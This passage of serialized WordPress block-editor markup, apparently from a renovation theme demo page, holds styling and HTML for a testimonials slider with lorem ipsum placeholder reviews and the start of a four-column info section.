{\"block_id\":\"2caf698d-f57b-4edb-a3c6-802f06514e20\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":32,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-2caf698d-f57b-4edb-a3c6-802f06514e20\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Testimonials</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Read Our Clients<br>Latest Reviews</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/testimonial-slider {\"classMigrate\":true,\"test_block\":[{\"description\":\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8f05029117\",\"delete\":\"a8ff1c4035\",\"edit\":\"ee60ba071d\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8c7518bbdc\",\"delete\":\"de8f66528c\",\"edit\":\"99bb75a0ef\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":16,\"title\":\"blog-img\",\"filename\":\"blog-img.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-img/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"blog-img\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:32.000Z\",\"modified\":\"2021-05-25T13:48:32.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"25f63e1ba1\",\"delete\":\"1ea75ab2d2\",\"edit\":\"f534b4e6c3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=16u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":53731,\"filesizeHumanReadable\":\"52 KB\",\"context\":\"\",\"height\":400,\"width\":560,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":214,\"width\":300,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-300x214.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"height\":400,\"width\":560,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"descColor\":\"#494848\",\"companyColor\":\"#303030\",\"authorColor\":\"#303030\",\"imagePosition\":\"left\",\"nameFontSize\":21,\"nameFontFamily\":\"Poppins\",\"nameFontWeight\":\"600\",\"companyFontSize\":16,\"companyFontFamily\":\"Poppins\",\"companyFontWeight\":\"400\",\"descFontSize\":16,\"descFontFamily\":\"Poppins\",\"descFontWeight\":\"400\",\"nameSpace\":10,\"descSpace\":20,\"block_id\":\"9a21f129\",\"imgVrPadding\":5,\"imgHrPadding\":20,\"columns\":2,\"transitionSpeed\":1000,\"autoplaySpeed\":5000,\"arrowDots\":\"dots\",\"rowGap\":20,\"columnGap\":25,\"contentPadding\":30,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\",\"arrowColor\":\"#fe8333\"} -->\n<style type=\"text/css\"> .skt-blocks-slick-carousel.skt-blocks-block-9a21f129 button.slick-arrow {\n border-width: 1px; border-radius: 0px; border-color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-9a21f129 ul.slick-dots li button:before, ul.slick-dots li.slick-active button:before {\n color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-9a21f129 .slick-arrow svg {\n fill: #fe8333; height: 20px; width: 20px; }\n .skt-blocks-tm__image img{\n width: 60px; max-width: 60px; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-color .skt-blocks-tm__content{\n background-color: #ffffff; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__content{\n background-image: url(null); background-position: center center; background-repeat: no-repeat; background-size: cover; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__overlay{\n background-color: undefined; opacity: 0.5; }\n .skt-blocks-testimonial__wrap {\n padding-left: 12.5px; padding-right: 12.5px; margin-bottom: 20px; }\n .skt-blocks-testimonial__wrap .skt-blocks-tm__image-content {\n padding-left: 20px; padding-right: 20px; padding-top: 5px; padding-bottom: 5px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-tm__desc {\n padding: 20px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap:before {\n border-top: 10px solid center; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap {\n background-color: center; border-radius: 0px; }\n</style><div class=\"skt-blocks-testomonial__outer-wrap skt-blocks-slick-carousel skt-blocks-tm__arrow-outside skt-blocks-block-9a21f129\"><div class=\"is-carousel skt-blocks-tm__columns-2 skt-blocks-tm__items responsive-testimonial-slick-carousel skt-blocks-block-9a21f129\"><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/testimonial-slider --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"310f3dbd-be56-4fc5-b52f-00b541d1d06c\"} -->\n<style type=\"text/css\"> .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-310f3dbd-be56-4fc5-b52f-00b541d1d06c skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6\"} -->\n<style type=\"text/css\"> .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"960934cc-d8f0-4b4d-9d0a-764129efdfa3\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n 